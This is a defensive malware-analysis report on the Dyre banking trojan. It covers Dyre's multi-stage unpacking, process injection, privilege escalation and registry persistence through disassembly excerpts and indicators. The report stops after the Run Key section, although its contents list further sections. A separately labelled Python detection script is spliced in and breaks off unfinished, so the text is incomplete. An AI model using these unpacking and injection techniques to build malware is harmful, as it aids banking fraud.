
Dyre Infection Analysis by Alexander Hanel

2014/11/24
Version 1.0
alexander.hanel@gmail.com


Executive Summary
Introduction
Family Name
Propagation
Sample Analyzed
Installation
Stage 1
Stage 2
Stage 3
Stage 4
Stage 5
Stage 6
Stage 7
General Details and Functionality
Persistence
Registry
Service
Run Key
Dropped Files
Service
Pipes
Mutex
Functionality Overview
Enumerating processes
Process Injection
Host IP Retrieval
VNC
Commands & Configurations
Commands & Configurations
Error Codes
Hooks
FireFox Hooks
Internet Explorer Hooks
Chrome Hooks
Anti-Detection functionality
Disabling RapportGP
Command and Control
Third Party Resources
URLs & IPs
Network Traffic Patterns
Appendix:
Strings
Stage 6 Dyre
Stage 7 Injected Process
Third Party Analysis

Executive Summary
This document is an analysis of the Dyre banking malware. It is intended to aid in understanding how Dyre executes and interacts with the operating system. The targeted audience is malware analysts, reverse engineers, system administrators, incident responders and forensic investigators. Hopefully an individual investigating an incident could use this document to determine if the infection is Dyre or not.

Introduction
Dyre is a banking trojan that was first seen in June of 2014. In terms of banking malware the family is rather recent. Most organizations and email providers have been hit with spam campaigns that either link to an exploit kit that drops Dyre or have been sent an email with a zip attachment that contains a Dyre executable. This document covers features of Dyre that I found interesting. Due to the size of the code not all features are covered. The sample I originally started with was an older sample. Newer samples that dropped a service crashed in my test environment. If you would like to contribute to this report please shoot me an email.

Family Name

Dyre
Dyreza
Dyzap
Battdil

Propagation
Dyre is usually downloaded by a lightweight trojan downloader named Upatre. The two families share the same packer/obfuscation. As of the time of this writing, Upatre is most commonly executed by users being socially engineered to open a zip file and execute it. The users will receive an email masquerading to be from a known entity such as Wells Fargo, IRS, Amazon, etc. The email will request the user to open the attachment. Once opened it will download Dyre.

Sample Analyzed

File Hash:                    099c36d73cad5f13ec1a89d5958486060977930b8e4d541e4a2f7d92e104cd21
File Size:                    440 kB
File Modification Date/Time:  2014:09:20 22:28:00-04:00
File Access Date/Time:        2014:11:11 17:28:16-05:00
File Creation Date/Time:      2014:11:11 17:25:43-05:00
File Type:                    Win32 EXE
MIME Type:                    application/octet-stream
Machine Type:                 Intel 386 or later, and compatibles
Time Stamp:                   2014:08:14 08:46:22-04:00
PE Type:                      PE32
Linker Version:               6.2
Code Size:                    376832
Initialized Data Size:        73728
Uninitialized Data Size:      0
Entry Point:                  0x3eec3
OS Version:                   4.0
Image Version:                0.0
Subsystem Version:            4.0
Subsystem:                    Windows GUI
File Version Number:          2.4.0.8376
Product Version Number:       2.4.0.8376
File Flags Mask:              0x0000
File Flags:                   (none)
File OS:                      Windows NT 32-bit
Object File Type:             Executable application
File Subtype:                 0
Language Code:                English (U.S.)
Character Set:                Windows, Latin1
File Description:             ViewerPDF
File Version:                 2.4.0.8376
Legal Copyright:              Copyright 2006-2013 all authors (GPLv3)
Original Filename:            ViewerPDF.exe
Product Name:                 ViewerPDF
Product Version:              2.4.0.8376

Installation
Dyre executes in seven stages. In order to understand the installation process it is useful to know the different stages. Knowing these stages can aid in detection.

Stages Description
1. Executable on disk, not executed.
2. The sample is loaded in memory, executing and modifying its own memory.
3. Position independent code running in allocated memory to decode the original Dyre installer.
4. Dyre installer.
5. Position independent code injected into svchost.exe or explorer.
6. Dyre injected DLL running in svchost.exe or explorer.**
7. Injected DLL running in browser memory space.**
** The DLL will not show up as a loaded module.

Note: The below stages were based off of one variant. Details such as folder paths, file names or injected processes vary. The General Details and Functionality section is written to cover more indicators of the different variants.

Stage 1
As previously mentioned, Upatre and Dyre share the same obfuscation tool. In this stage the samples are very similar except for a couple of differences. The most notable difference is the imports. Below are the imports for Upatre. Most of the MSVCRT APIs are invoked during WinMain.

Note: Parts of this can be a little esoteric and may be only interesting to myself and/or others who like to understand file randomization.

Address   Ordinal  Name                Library

00403000           SetBkColor          GDI32
00403008           GetStartupInfoA     KERNEL32
0040300C           GetModuleHandleA    KERNEL32
00403010           GetModuleHandleW    KERNEL32
00403014           CloseHandle         KERNEL32
00403018           CreateFileW         KERNEL32
0040301C           WriteFile           KERNEL32
00403020           ReadFile            KERNEL32
00403028           __getmainargs       MSVCRT
0040302C           _controlfp          MSVCRT
00403030           _except_handler3    MSVCRT
00403034           __set_app_type      MSVCRT
00403038           __p__fmode          MSVCRT
0040303C           __p__commode        MSVCRT
00403040           _adjust_fdiv        MSVCRT
00403044           __setusermatherr    MSVCRT
00403048           _exit               MSVCRT
0040304C           _XcptFilter         MSVCRT
00403050           exit                MSVCRT
00403054           _acmdln             MSVCRT
00403058           _initterm           MSVCRT
00403060           RegisterClassExW    USER32
00403064           CreateWindowExW     USER32
00403068           GetMessageW         USER32
0040306C           TranslateMessage    USER32
00403070           DispatchMessageW    USER32
00403074           DefWindowProcW      USER32
00403078           PostQuitMessage     USER32
0040307C           ShowWindow          USER32
00403080           UpdateWindow        USER32
00403084           SetWindowTextW      USER32
00403088           PostMessageW        USER32

If you have read my Upatre Sample Set Analysis a number of these APIs will look familiar: GetModuleHandleA, GetStartupInfoA, EnableWindow, etc.

Address   Ordinal  Name                                              Library

0045D000           GetModuleHandleA                                  KERNEL32
0045D004           GetStartupInfoA                                   KERNEL32
0045D2F8  6336     __imp_?UpdateFrameCounts@CDocument@@UAEXXZ        MFC42
0045D05C  5577     __imp_?ReleaseFile@CDocument@@UAEXPAVCFile@@H@Z   MFC42
...............................
0045D078  5241     ?PostNcDestroy@CWnd@@MAEXXZ                       MFC42
0045D074  4396     __imp_?OnChildNotify@CButton@@MAEHIIJPAJ@Z        MFC42
0045D0DC  4108     __imp_?IsSelected@CView@@UBEHPBVCObject@@@Z       MFC42
0045D06C  4242     ?messageMap@CFrameWnd@@1UAFX_MSGMAP@@B            MFC42
0045D068  1842     ?classCFrameWnd@CFrameWnd@@2UCRuntimeClass@@B     MFC42
0045D064  5740     __imp_?SaveModified@CDocument@@UAEHXZ             MFC42
........
0045D354           _setmbcp                                          MSVCRT
0045D350           ??2@YAPAXI@Z                                      MSVCRT
.....
0045D310           _except_handler3                                  MSVCRT
0045D30C           _controlfp                                        MSVCRT
0045D368           EnableWindow                                      USER32
0045D364           SendMessageA                                      USER32
0045D360           UpdateWindow                                      USER32
0045D35C           LoadCursorA                                       USER32

One noticeable difference between the two sets is that the Microsoft Foundation Class Library has been included. Most of the APIs from the library are never called. The purpose of importing the APIs is to add more data and code to help randomize the executable against hashing. This is a good example of why relying on hashing of APIs is not always a good idea for clustering families. The authors of the obfuscation tool used by Upatre and Dyre have added slight variations through pointer arithmetic to randomize the code.

Upatre
.text:0040106F _GetImageOptionalHeaderAddress proc near
.text:0040106F     mov     ecx, [eax+3Ch]          ; note: 0x3C
.text:00401072     mov     [ebp-4], eax
.text:00401075     and     ecx, 0FFFFh
.text:0040107B     add     eax, ecx
.text:0040107D     mov     ecx, 18h
.text:00401082     add     eax, ecx
.text:00401084     inc     ecx
.text:00401085     add     ecx, 0F0h
.text:0040108B     retn
.text:0040108B _GetImageOptionalHeaderAddress endp

Dyre
.text:004469B0 _GetImageOptionalHeaderAddress proc near
.text:004469B0     mov     [ebp-4], eax
.text:004469B3     xor     ecx, ecx
.text:004469B5     inc     eax                     ; inc eax so [EAX+3Bh] equals [EAX+0x3C]
.text:004469B6     mov     cx, [eax+3Bh]
.text:004469BA     add     eax, ecx
.text:004469BC     dec     eax
.text:004469BD     mov     ecx, 18h
.text:004469C2     add     eax, ecx
.text:004469C4     inc     ecx
.text:004469C5     add     ecx, 0F0h
.text:004469CB     retn
.text:004469CB _GetImageOptionalHeaderAddress endp

Stage 2

.text:0044F240 sub_44F240 proc near                ; CODE XREF:
.text:0044F240     push    ebp                     ; count: 1
.text:0044F241     mov     ebp, esp                ; count: 1
.text:0044F243     push    offset _call_decoder    ; count: 1
.text:0044F248     call    _atexit                 ; count: 1
.text:0044F24D     add     esp, 4                  ; count: 1
.text:0044F250     pop     ebp                     ; count: 1
.text:0044F251     retn                            ; count: 1
.text:0044F251 sub_44F240 endp

Stage 2 happens after a call to _atexit. This stage will call VirtualProtect and decode stage 3. Calling the _atexit function directly will not work because the sample relies on predicted values generated by calling useless APIs.

Invoked during WinMain
.text:00401380     mov     [ebp-34h], eax
.text:00401383     mov     ecx, [ebp-0ACh]
.text:00401389     call    ?GetExStyle@CWnd@@QBEKXZ    ; CWnd::GetExStyle(void) retrieves the extended window styles of the window.
.text:0040138E     mov     dword_46C1CC, eax           ; eax = 0x100 WS_EX_WINDOWEDGE

Invoked after _atexit
.text:0043EC95     mov     eax, dword_46C1CC
.text:0043EC9A     sub     eax, 0F9h                   ; 0x100 - 0xf9 = 7
.text:0043EC9F     call    _thread


.text:0044A790 _thread proc near                       ; CODE XREF:
.text:0044A790     mov     ecx, eax                    ; eax = 7
.text:0044A792     sub     ecx, 7
.text:0044A795     test    ecx, ecx                    ; ecx = 0
.text:0044A797     jz      short loc_44A7B5
.text:0044A799     inc     ecx
.text:0044A79A     retn
.text:0044A79A
.text:0044A79B     db 6Ah
.text:0044A79C
.text:0044A79C     jmp     fword ptr [eax+19h]
.text:0044A79C
.text:0044A79F     db 77h
.text:0044A7A0     dd 0A1640052h, 0
.text:0044A7A8     dd 25896450h, 0
.text:0044A7B0     dd 68685351h
.text:0044A7B4     db 0D1h
.text:0044A7B5
.text:0044A7B5 loc_44A7B5:                             ; CODE XREF: _thread+7j
.text:0044A7B5     mov     ebp, esp
.text:0044A7B7     mov     dword_465FE4, esp
.text:0044A7BD
.text:0044A7BD loc_44A7BD:                             ; CODE XREF: _thread+45j
.text:0044A7BD     push    eax
.text:0044A7BE     mov     eax, offset GetStartupInfoA
.text:0044A7C3     mov     edx, offset loc_43EB90
.text:0044A7C8     mov     eax, [eax]
.text:0044A7CA     mov     dword_465FF0, eax
.text:0044A7CF     pop     eax
.text:0044A7D0     add     edx, eax
.text:0044A7D2     push    edx                         ; 0043EB97
.text:0044A7D3     test    eax, eax
.text:0044A7D5     jz      short loc_44A7BD
.text:0044A7D7     call    dword ptr [ebp-4]           ; 0043EB97
...
...
.text:0043EB97 _init_decode proc near
.text:0043EB97     mov     ecx, eax
.text:0043EB99     push    ecx
.text:0043EB9A     inc     ecx
.text:0043EB9B     cmp     ecx, 0Ah
.text:0043EB9E     jz      sub_4469B0
.text:0043EBA4     call    sub_4110F0
.text:0043EBA9     mov     ecx, 42h
.text:0043EBAE     push    offset unk_46B194
.text:0043EBB3     lea     esi, dword_43F030
.text:0043EBB9     dec     ecx
.text:0043EBBA     dec     ecx
.text:0043EBBB     push    ecx
.text:0043EBBC     mov     edx, offset _2ndStage
.text:0043EBC1     push    edi
.text:0043EBC2     push    edx
.text:0043EBC3     jmp     short loc_43EBDE            ; VirtualProtect
.text:0043EBC5
.text:0043EBC5 loc_43EBC5:                             ; CODE XREF: _init_decode+49j
.text:0043EBC5     mov     ecx, 127                    ; XOR loop count
.text:0043EBCA     mov     edi, offset _2ndStage       ; buffer to decode
.text:0043EBCF     inc     ecx
.text:0043EBD0     mov     eax, dword_465EA2
.text:0043EBD5     call    _decode_0
.text:0043EBDA     pop     eax
.text:0043EBDB     inc     eax
.text:0043EBDC     inc     eax
.text:0043EBDD     retn
.text:0043EBDE
.text:0043EBDE loc_43EBDE:                             ; CODE XREF: _init_decode+2Cj
.text:0043EBDE     call    eax                         ; VirtualProtect
.text:0043EBE0     jmp     short loc_43EBC5
.text:0043EBE0 _init_decode endp

.text:00442430 _xor_save proc near                     ; CODE XREF: decode+6p
.text:00442430     mov     eax, esi
.text:00442432     mov     eax, [eax]
.text:00442434     xor     eax, ecx
.text:00442436     call    save_xored
.text:0044243B     retn
.text:0044243B _xor_save endp

RE Notes: To bypass these stages set a breakpoint on VirtualProtectEx, execute, then set a hardware breakpoint on the address passed as the second argument to VirtualProtect, then execute. The second stage is responsible for allocating memory, decoding a buffer using the same XOR routine and writing the third stage to memory. Setting a breakpoint at the last call eax will take us to the third stage. See the below assembly.


0041F620  55            PUSH EBP
0041F621  8BEC          MOV EBP,ESP
0041F623  83C4F4        ADD ESP,-0C
0041F626  8945F4        MOV DWORD PTR SS:[EBP-C],EAX
0041F629  8B5D08        MOV EBX,DWORD PTR SS:[EBP+8]
0041F62C  8B4304        MOV EAX,DWORD PTR DS:[EBX+4]
0041F62F  50            PUSH EAX                                  ; addr of str VirtualAlloc
0041F630  8B5320        MOV EDX,DWORD PTR DS:[EBX+20]
0041F633  8B4210        MOV EAX,DWORD PTR DS:[EDX+10]
0041F636  50            PUSH EAX
0041F637  8B4208        MOV EAX,DWORD PTR DS:[EDX+8]
0041F63A  FFD0          CALL EAX                                  ; 00417C60 get import address
0041F63C  8945F8        MOV DWORD PTR SS:[EBP-8],EAX
0041F63F  8B4B0C        MOV ECX,DWORD PTR DS:[EBX+C]
0041F642  C1E90C        SHR ECX,0C
0041F645  41            INC ECX
0041F646  C1E10C        SHL ECX,0C
0041F649  33C0          XOR EAX,EAX
0041F64B  6A40          PUSH 40
0041F64D  6800100000    PUSH 1000
0041F652  51            PUSH ECX
0041F653  50            PUSH EAX
0041F654  8B45F8        MOV EAX,DWORD PTR SS:[EBP-8]
0041F657  FFD0          CALL EAX                                  ; VirtualAlloc
0041F659  85C0          TEST EAX,EAX
0041F65B  743F          JE SHORT x.0041F69C
0041F65D  8945FC        MOV DWORD PTR SS:[EBP-4],EAX
0041F660  8B7DFC        MOV EDI,DWORD PTR SS:[EBP-4]
0041F663  8B5314        MOV EDX,DWORD PTR DS:[EBX+14]
0041F666  53            PUSH EBX
0041F667  8B5B10        MOV EBX,DWORD PTR DS:[EBX+10]
0041F66A  8B33          MOV ESI,DWORD PTR DS:[EBX]
0041F66C  0FB70A        MOVZX ECX,WORD PTR DS:[EDX]
0041F66F  83F900        CMP ECX,0
0041F672  740A          JE SHORT x.0041F67E
0041F674  43            INC EBX
0041F675  43            INC EBX
0041F676  43            INC EBX
0041F677  43            INC EBX
0041F678  42            INC EDX
0041F679  42            INC EDX
0041F67A  F3:A4         REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI]   ; copy data to heap
0041F67C ^EBEC          JMP SHORT x.0041F66A
0041F67E  5B            POP EBX
0041F67F  8B7DFC        MOV EDI,DWORD PTR SS:[EBP-4]
0041F682  8B7318        MOV ESI,DWORD PTR DS:[EBX+18]
0041F685  8B431C        MOV EAX,DWORD PTR DS:[EBX+1C]
0041F688  8B4B0C        MOV ECX,DWORD PTR DS:[EBX+C]
0041F68B  8B5308        MOV EDX,DWORD PTR DS:[EBX+8]
0041F68E  FFD2          CALL EDX                                  ; <- decode buffer
0041F690  8B4B20        MOV ECX,DWORD PTR DS:[EBX+20]
0041F693  8B45FC        MOV EAX,DWORD PTR SS:[EBP-4]
0041F696  0345F4        ADD EAX,DWORD PTR SS:[EBP-C]
0041F699  51            PUSH ECX
0041F69A  FFD0          CALL EAX                                  ; <- breakpoint: stage three
0041F69C  8BE5          MOV ESP,EBP
0041F69E  5D            POP EBP
0041F69F  C3            RETN

Stage 3

The third stage typically starts with the GetEIP trick.

seg000:009D0009     call    $+5
seg000:009D000E     pop     ebx
seg000:009D000F     add     ebx, 6
seg000:009D0012     jmp     short sub_9D0083
seg000:009D0012
seg000:009D0014 aLoadlibrarya   db 'LoadLibraryA',0
seg000:009D0021 aGetprocaddress db 'GetProcAddress',0
seg000:009D0030                 db 1
seg000:009D0031 aKernel32_dll   db 'kernel32.dll',0
seg000:009D003E aVirtualalloc   db 'VirtualAlloc',0
seg000:009D004B aVirtualprotect db 'VirtualProtect',0
seg000:009D005A aVirtualfree    db 'VirtualFree',0
seg000:009D0066 aUnmapviewoffil db 'UnmapViewOfFile',0
seg000:009D0076 aExitprocess    db 'ExitProcess',0
seg000:009D0082                 db 2

This stage is responsible for decoding an embedded executable file and then overwriting the original executable's memory. It will call UnmapViewOfFile to remove the original loaded executable from memory, allocate and write memory for each section of the executable, rebuild the import table, change the memory rights and then free the memory. Once this is completed it will jump to the next stage.

RE Notes: An easy way to carve out the executable is to set a breakpoint on UnmapViewOfFile, execute, then set a breakpoint on VirtualFree, execute, then dump the memory that is being freed.

Stage 4
The fourth stage is the Dyre dropper. The entry point will look something like this. Notice EIP points to an area of memory at the original base address.

.text:004025D0     push    ebp
.text:004025D1     mov     ebp, esp
.text:004025D3     and     esp, 0FFFFFFF8h
.text:004025D6     sub     esp, 5D4h
.text:004025DC     push    ebx
.text:004025DD     push    esi
.text:004025DE     push    edi
.text:004025DF     push    168h                        ; nSize
.text:004025E4     lea     eax, [esp+5E4h+Data]
.text:004025EB     push    eax                         ; lpFilename
.text:004025EC     push    0                           ; hModule
.text:004025EE     call    ds:GetModuleFileNameW
.text:004025F4     cmp     hHeap, 0
.text:004025FB     jnz     short loc_402618
.text:004025FD     push    0                           ; dwMaximumSize
.text:004025FF     push    400000h                     ; dwInitialSize
.text:00402604     push    40000h                      ; flOptions
.text:00402609     call    ds:HeapCreate
.text:0040260F     mov     hHeap, eax
.text:00402614     test    eax, eax

Note: The below process varies between versions. See the Dropped Files section for variations on dropped files.

The sample will check that it is running in the Application Data folder by calling SHGetFolderPath with CSIDL_APPDATA. If the sample is running on Windows Vista or later it will be running from %USERPROFILE%\AppData\Roaming; if lower than Vista, %USERPROFILE%\Application Data. If the sample is not running in %APPDATA% it will generate a random 15 char string and concatenate it with ".exe":

DDoKxGmEEQspft.exe
QLysiyFCqsHTenS.exe
rJSyaumrkjfVcxY.exe
wHepYHNuahJReRa.exe
XMoVNxUrnyNxMnH.exe
yDDoKxGmEEQspft.exe

It will then write itself to %APPDATA% and execute it with its file path as an argument. If the sample is already running from %APPDATA% it will create a mutex to see if only one instance is executing.

.text:004026E8     push    offset aGlobal553wwerd      ; "Global\\553wwerdty7"
.text:004026ED     push    0                           ; bInheritHandle
.text:004026EF     push    100000h                     ; dwDesiredAccess
.text:004026F4     call    ds:OpenMutexW

If the sample is executing for the first time it will delete the previously run executable. The sample will then create a run key.

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
@="C:\\Documents and Settings\\Administrator\\Application Data\\XMoVNxUrnyNxMnH.exe"

Creating rules to detect the creation of autorun registry keys that point to files in %APPDATA% is an easy way to identify suspicious executables from a HIPS or Windows events perspective.
After the registry key is written the sample will call IsWow64Process to identify if it is running on a 64-bit system. It will then create a file mapping of a resource and adjust its privileges to "SeDebugPrivilege". Once completed it will call CreateToolhelp32Snapshot to search for "svchost.exe". If the process is running as NT AUTHORITY\SYSTEM it will inject into the process.

.text:00401388     push    eax                         ; pSid
.text:00401389     push    ebx                         ; DomainSid
.text:0040138A     push    WinLocalSystemSid           ; WellKnownSidType
.text:0040138C     mov     [ebp+cbSid], 44h
.text:00401393     call    ds:CreateWellKnownSid       ; creates a SID for predefined aliases
....
.text:004013AA     push    ecx                         ; ReturnLength
.text:004013AB     push    ebx                         ; TokenInformationLength
.text:004013AC     push    ebx                         ; TokenInformation
.text:004013AD     push    1                           ; TokenInformationClass
.text:004013AF     push    edx                         ; TokenHandle
.text:004013B0     mov     [ebp+ReturnLength], ebx
.text:004013B3     call    edi                         ; GetTokenInformation
.text:004013B5     call    ds:GetLastError
.text:004013BB     cmp     eax, ERROR_INSUFFICIENT_BUFFER
....
.text:004013F1     lea     edx, [ebp+pSid]
.text:004013F4     push    edx                         ; pSid2
.text:004013F5     push    eax                         ; pSid1
.text:004013F6     call    ds:EqualSid

Once the process is injected it will open the mutex it created earlier. Once this stage is completed it will call ExitProcess.

Stage 5

The entry point of the injected process is not the entry point of the executable but the base address of the allocated memory. The first 0x640 bytes of the memory block contain position independent code that is responsible for loading and rebuilding the import table for an executable that follows the code. This approach is notable because any executable file can be injected into a process. The embedded executable does not need to be modified to include position independent code functionality.

Offset(h)  00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F

00000000   55 89 E5 57 56 51 52 53 8B 75 08 E8 EA 01 00 00   U..WVQRS.u......
00000010   89 C3 8D 46 61 50 53 E8 D0 02 00 00 55 8D 6E 51   ...FaPS.....U.nQ
00000020   89 45 04 89 5D 00 8D 86 47 06 00 00 89 45 08 8B   .E..]...G....E..
00000030   86 43 06 00 00 89 45 0C E8 47 01 00 00 8D 86 87   .C....E..G......
00000040   03 00 00 FF D0 5D 31 C0 5B 5A 59 5E 5F C9 C2 0C   .....]1.[ZY^_...
00000050   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00000060   00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00   .GetProcAddress.

seg000:00920000 55                  push    ebp
seg000:00920001 89 E5               mov     ebp, esp
seg000:00920003 57                  push    edi
seg000:00920004 56                  push    esi
seg000:00920005 51                  push    ecx
seg000:00920006 52                  push    edx
seg000:00920007 53                  push    ebx
seg000:00920008 8B 75 08            mov     esi, [ebp+arg_0]
seg000:0092000B E8 EA 01 00 00      call    GetKernelBase
seg000:00920010 89 C3               mov     ebx, eax
seg000:00920012 8D 46 61            lea     eax, [esi+61h]
seg000:00920015 50                  push    eax                 ; "GetProcAddress"
seg000:00920016 53                  push    ebx
seg000:00920017
seg000:00920017 loc_920017:
seg000:00920017 E8 D0 02 00 00      call    _IAT_Lookup
seg000:0092001C 55                  push    ebp
seg000:0092001D 8D 6E 51            lea     ebp, [esi+51h]
seg000:00920020 89 45 04            mov     [ebp+4], eax
seg000:00920023 89 5D 00            mov     [ebp+var_s0], ebx
seg000:00920026 8D 86 47 06 00+     lea     eax, [esi+647h]     ; MZ header

The memory of the injected process can be identified by the RWX rights.

Private (Commit), 0x630000,  124 kB,  RWX    Loader Code
Mapped (Commit),  0xf00000,  104 kB,  RWX    DLL
Private (Commit), 0x2410000, 3.48 MB, RWX    DATA
Private (Commit), 0x2792000, 504 kB,  RWX    DATA

Stage 6
The loaded executable will not contain the position independent code. It will start with the standard MZ header.

Offset(h)  00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F

00000000   4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00   MZ..............
00000010   B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00   ........@.......
00000020   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
00000030   00 00 00 00 00 00 00 00 00 00 00 00 D8 00 00 00   ................
00000040   0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68   ........!..L.!Th
00000050   69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F   is program canno
00000060   74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20   t be run in DOS 
00000070   6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00   mode....$.......
00000080   08 EE 31 68 4C 8F 5F 3B 4C 8F 5F 3B 4C 8F 5F 3B   ..1hL._;L._;L._;
00000090   45 F7 CC 3B 59 8F 5F 3B 4C 8F 5E 3B 8D 8F 5F 3B   E..;Y._;L.^;.._;
000000A0   23 F9 F0 3B 64 8F 5F 3B 23 F9 C1 3B 4D 8F 5F 3B   #..;d._;#..;M._;
000000B0   23 F9 C2 3B 4D 8F 5F 3B 52 69 63 68 4C 8F 5F 3B   #..;M._;RichL._;
000000C0   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................

Note: The C2 can be parsed out of the DATA memory regions.

Checks if a hardcoded mutex string is present to determine if it is already running. The mutex string is a variation of the author pressing random chars on the keyboard with their left hand, "Global\\553wwerdty7". An example of this can be seen in the name of the log file "d6r5g4da.db" and the named RCDATA (raw data resource) "u1xdfy2dv". The named resources are used to store the initial config file and the injected code.

Creates a configuration file in the %APPDATA% directory:

Offset(h)  00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F

00000000   05 00 62 6F 74 69 64 39 00 00 00 55 53 45 52 35   ..botid9...USER5
00000010   34 4B 39 2D 33 44 38 46 36 41 5F 57 35 31 32 36   4K9-3D8F6A_W5126
00000020   30 30 2E 42 44 36 32 46 46 39 38 30 45 35 38 30   00.BD62FF980E580
00000030   37 34 36 37 33 41 38 39 45 41 31 46 41 38 34 35   74673A89EA1FA845
00000040   46 43 38 00 50 02 71 A8 8B BD A0 5E 04 56 F2 60   FC8.P.q....^.V.`
00000050   03 E3 E4 25 50 76 36 6F 97 A4 D7 06 88 18 F6 7C   ...%Pv6o.......|
00000060   E2 2F 1B F8                                       ./..

Adjusts the token to have SeDebugPrivilege.

.text:10004646     call    ds:GetCurrentProcess
.text:1000464C     push    eax                         ; ProcessHandle
.text:1000464D     call    ds:OpenProcessToken
.text:10004653     test    eax, eax
.text:10004655     jz      short loc_10004696
.text:10004657     lea     eax, [ebp+NewState.Privileges]
.text:1000465A     push    eax                         ; lpLuid
.text:1000465B     push    offset aSedebugprivile      ; "SeDebugPrivilege"
.text:10004660     push    esi                         ; lpSystemName
.text:10004661     mov     [ebp+NewState.PrivilegeCount], 1
.text:10004668     call    ds:LookupPrivilegeValueW
.text:1000466E     test    eax, eax
.text:10004670     jz      short loc_1000468D
.text:10004672     push    esi                         ; ReturnLength
.text:10004673     push    esi                         ; PreviousState
.text:10004674     push    10h                         ; BufferLength
.text:10004676     lea     eax, [ebp+NewState]
.text:10004679     push    eax                         ; NewState
.text:1000467A     push    esi                         ; DisableAllPrivileges
.text:1000467B     push    [ebp+hObject]               ; TokenHandle
.text:1000467E     mov     [ebp+NewState.Privileges.Attributes], 2
.text:10004685     call    ds:AdjustTokenPrivileges

Stage 7
The last stage is the DLL injected into a browser such as iexplore.exe, firefox.exe or chrome.exe. This stage will only have been reached if Dyre has been able to connect to the internet. The injected DLL contains 170+ functions. The functions range from creating hooks in the browsers (see Hooks) to monitor traffic, communication with the main Dyre executable via named pipes, rerouting traffic, etc. The injected memory would have the below characteristics.
Private (Commit), 0xa00000, 96 kB, RWX+G

General Details and Functionality


Persistence
Dyre uses the registry to survive a reboot.

Registry
Service
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\googleupdate

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\googleupdate  Type          dword:00000010
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\googleupdate  Start         dword:00000002
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\googleupdate  ErrorControl  dword:00000001
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\googleupdate  ImagePath     hex(2):43,3a,5c,57,49,4e,44,4f,57,53,5c,43,48,55,6e,46,61,57,4c,67,66,4a,54,42,64,77,2e,65,78,65,00,
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\googleupdate  DisplayName   "Google Update Service"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\googleupdate  ObjectName    "LocalSystem"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\googleupdate\Security


Run Key
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run  GoogleUpdate  "C:\Documents and Settings\Administrator\Application Data\googleupdaterr.exe"

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run  @             "C:\Documents and Settings\Administrator\Application Data\EDPBxttMFiiCodB.exe"
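As an added example (not code from the report), the following Python turns the two persistence indicators described on this page, the Stage 4 autorun value that points into %APPDATA% with a 15-letter random executable name and the service ImagePath from the Registry section above, into a check over registry export entries. The entries are constructed from the dump on this page plus one benign control; the hex(2) decoder assumes single-byte characters as shown here or UTF-16LE as in a normal .reg export, and the indicator names are my own.

```python
"""Flag Dyre-style persistence entries in a registry export (added example)."""
import re
from typing import Dict, List, Tuple

RegEntry = Tuple[str, str, str]  # (key path, value name, data as exported)

# Dyre's dropped executables use 15 random upper/lower case letters (Stage 4, Dropped Files).
RANDOM_EXE = re.compile(r"^[A-Za-z]{15}\.exe$")
APPDATA_MARKERS = ("\\application data\\", "\\appdata\\roaming\\", "%appdata%\\")
RUN_KEY_SUFFIX = "\\microsoft\\windows\\currentversion\\run"
SERVICES_PREFIX = "hkey_local_machine\\system\\currentcontrolset\\services\\"


def decode_reg_data(data: str) -> str:
    """Turn exported registry data into a plain string.

    Handles quoted strings and hex(2): comma-separated bytes. The dump on this page
    stores the ImagePath as single-byte characters; a regular .reg export would use
    UTF-16LE, so both encodings are accepted (assumption, see lead-in).
    """
    data = data.strip()
    if data.startswith('"') and data.endswith('"'):
        return data[1:-1]
    if data.lower().startswith("hex(2):"):
        raw = bytes(int(b, 16) for b in data[7:].split(",") if b.strip())
        if len(raw) >= 2 and all(raw[i] == 0 for i in range(1, len(raw), 2)):
            text = raw.decode("utf-16-le", errors="replace")
        else:
            text = raw.decode("latin-1")
        return text.rstrip("\x00")
    return data


def exe_from_command(command: str) -> str:
    """Return the executable path from a Run/ImagePath command line (quotes and arguments stripped)."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    idx = command.lower().find(".exe")
    return command[: idx + 4] if idx >= 0 else command.split(" ")[0]


def indicators(entry: RegEntry) -> List[str]:
    """Return the Dyre persistence indicators that fire for one registry value."""
    key, name, data = entry
    key_l = key.lower()
    hits: List[str] = []
    if key_l.endswith(RUN_KEY_SUFFIX):
        path = exe_from_command(decode_reg_data(data))
        basename = path.rsplit("\\", 1)[-1]
        if any(m in path.lower() for m in APPDATA_MARKERS):
            hits.append("run-key-appdata")            # autorun pointing into %APPDATA%
        if RANDOM_EXE.match(basename):
            hits.append("random-15-char-exe")
    elif key_l.startswith(SERVICES_PREFIX) and name.lower() == "imagepath":
        path = exe_from_command(decode_reg_data(data))
        basename = path.rsplit("\\", 1)[-1]
        parent = path.lower().rsplit("\\", 1)[0] if "\\" in path else ""
        if parent == "c:\\windows":
            hits.append("service-exe-in-windows-root")  # dropped next to the .INI files
        if RANDOM_EXE.match(basename):
            hits.append("random-15-char-exe")
    return hits


def scan(entries: List[RegEntry]) -> Dict[str, List[str]]:
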